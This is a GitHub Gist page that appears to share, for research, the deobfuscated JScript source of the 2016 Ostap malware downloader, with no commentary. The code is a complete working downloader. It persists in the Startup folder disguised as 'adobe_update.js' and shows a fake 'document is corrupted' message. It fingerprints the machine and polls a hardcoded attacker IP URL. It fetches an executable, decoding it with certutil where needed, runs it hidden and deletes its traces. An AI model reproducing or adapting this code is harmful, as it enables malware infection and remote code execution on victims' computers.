Instantly share code, notes, and snippets.

Embed
What would you like to do?
2016 Ostap Deobfuscated (ostap.php)
(function () {
pre_opened4 = 0.637;
pre_weakly = 0.129;
pre_they9 = 733;
pre_idea = 0.951;
pre_worse = 371;
pre_here = 0.382;
pre_monster10 = 739;
pre_know3 = 0.302;
pre_doing = 0.5;
pre_hurled2 = 411;
pre_thats = 923;
pre_middle0 = 0.608;
pre_this = 0.796;
pre_fail = 0.347;
pre_windowsill = 0.656;
pre_about = 0.137;
pre_crowdedIt = 32;
pre_kinds10 = 0.191;
var pre_known = ActiveXObject;
var pre_drop = WScript;
var pre_voices = WScript.CreateObject('WScript.Shell');
var fso12 = new ActiveXObject('Scripting.FileSystemObject');
try {
var fstream = new ActiveXObject('ADODB.Stream');
} catch (e) {
}
var oShell = new pre_known('Shell.Application');
var temp12 = ExpandEnvironmentStrings('%TEMP%');
var char123 = '\\';
var pre_imagery = temp12 + char123 + Math.floor(Math.random() * (50 + 50) + 1) + '.exe';
var pre_dawn = temp12 + char123 + Math.floor(Math.random() * (50 + 50) + 1) + '.xmp';
var pre_right = new pre_known('Msxml2.ServerXMLHTTP');
var body12 = char123 + 'adobe_update.js';
var startupFolder = oShell['NameSpace'](3 + 2 + 1 + 1);
var flagme = false;
var pre_opened4 = false;
var pre_garden = 1;
var hashhere = 0;
var pre_either10 = 0;
var out123 = 0;
var mz12 = 'MZ';
var empty12 = null;
var pre_head = null;
var objFile = null;
var filets = null;
var scrpath = pre_drop['ScriptFullName'];
var autor = startupFolder.Self.Path + body12;
var uidhere = autor;
var cmd12 = '/c start ';
var pre_concentrated = '-decode ';
var pre_written = 'https://217.29.58.174:4433/MIKE/ostap.php?add=fty7ygvhuijhbvfdew2erfvghu8ujhvfcdxe4r5t6y';
if (scrpath != autor && flagme == false) {
flagme = true;
fso12['DeleteFile'](scrpath);
pre_drop['echo']('The document is corrupted and cannot be opened');
pre_drop['Sleep'](3000);
}
uidhere = uidhere + pre_voices['Environment']('PROCESS')['Item']('COMPUTERNAME');
for (pre_either10 = 0; pre_either10 < uidhere.length; pre_either10++) {
hashhere = (hashhere << 5) - hashhere + uidhere['charCodeAt'](pre_either10) & 4294967295;
}
if (pre_voices['Environment']('PROCESS')['Item']('HOMEPATH')['indexOf'](char123 + 'Users' + char123) == 0) {
pre_either10 = 20;
} else {
pre_either10 = 10;
}
while (true) {
pre_garden = pre_garden + 1;
if (pre_garden == 1 * 30000 * 1 * 10000 * 1) {
while (true) {
try {
pre_right['setOption'](1 + 2, 'MSXML');
pre_right['open']('GET', pre_written + '&' + Math['floor'](Math['random']() * 100 + 1) + '&uid=' + Math['abs'](hashhere) + '&out=' + out123 + '&ver=' + pre_either10, false);
pre_right['send']();
if (pre_right['status'] == 25 + 25 + 150 + 0) {
if (out123 > 0)
break;
if (fso12['FileExists'](pre_imagery))
fso12['DeleteFile'](pre_imagery);
if (fso12['FileExists'](pre_dawn))
fso12['DeleteFile'](pre_dawn);
empty12 = pre_right['responseText'];
if (empty12['substring'](0, 2) == mz12) {
fstream['Open']();
fstream['Type'] = 1;
fstream['Write'](pre_right['responseBody']);
fstream['Position'] = 0;
fstream['SaveToFile'](pre_imagery);
fstream['Close']();
} else {
if (empty12.length > 1024) {
objFile = fso12['CreateTextFile'](pre_dawn, true, false);
objFile['WriteLine'](empty12);
objFile['Close']();
pre_concentrated = pre_concentrated + pre_dawn + ' ' + pre_imagery;
oShell['ShellExecute']('certutil', pre_concentrated, '', 'open', 0);
}
}
pre_drop['Sleep'](5000);
if (!fso12['FileExists'](pre_imagery))
continue;
filets = fso12['GetFile'](pre_imagery)['OpenAsTextStream'](1);
if (filets['ReadLine']()['substring'](0, 2) == mz12) {
filets['Close']();
pre_garden = 1;
try {
pre_head = pre_voices['Exec'](pre_imagery);
pre_garden = pre_head['ProcessID'];
} catch (e) {
try {
oShell['ShellExecute'](pre_imagery, '', '', 'open', 0);
pre_garden = 2;
} catch (e) {
cmd12 = cmd12 + pre_imagery;
oShell['ShellExecute']('%COMSPEC%', cmd12, '', 'open', 0);
pre_garden = 3;
}
}
out123 = pre_garden;
if (fso12['FileExists'](pre_drop['ScriptFullName']))
fso12['DeleteFile'](pre_drop['ScriptFullName']);
pre_drop['Sleep'](5000);
if (fso12['FileExists'](pre_imagery))
fso12['DeleteFile'](pre_imagery);
continue;
}
filets['Close']();
}
} catch (e) {
}
pre_drop['Sleep'](10000 * 6);
}
break;
}
}
pre_nothing10 = undefined;
pre_sank = undefined;
pre_those = undefined;
pre_Guys = undefined;
pre_problem8 = undefined;
pre_snotnosesAt0 = undefined;
pre_them = undefined;
pre_burns = undefined;
pre_cant = undefined;
pre_little = undefined;
pre_snow5 = undefined;
pre_believe = undefined;
pre_hell8 = undefined;
pre_cant = undefined;
pre_other2 = undefined;
pre_because = undefined;
}());
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment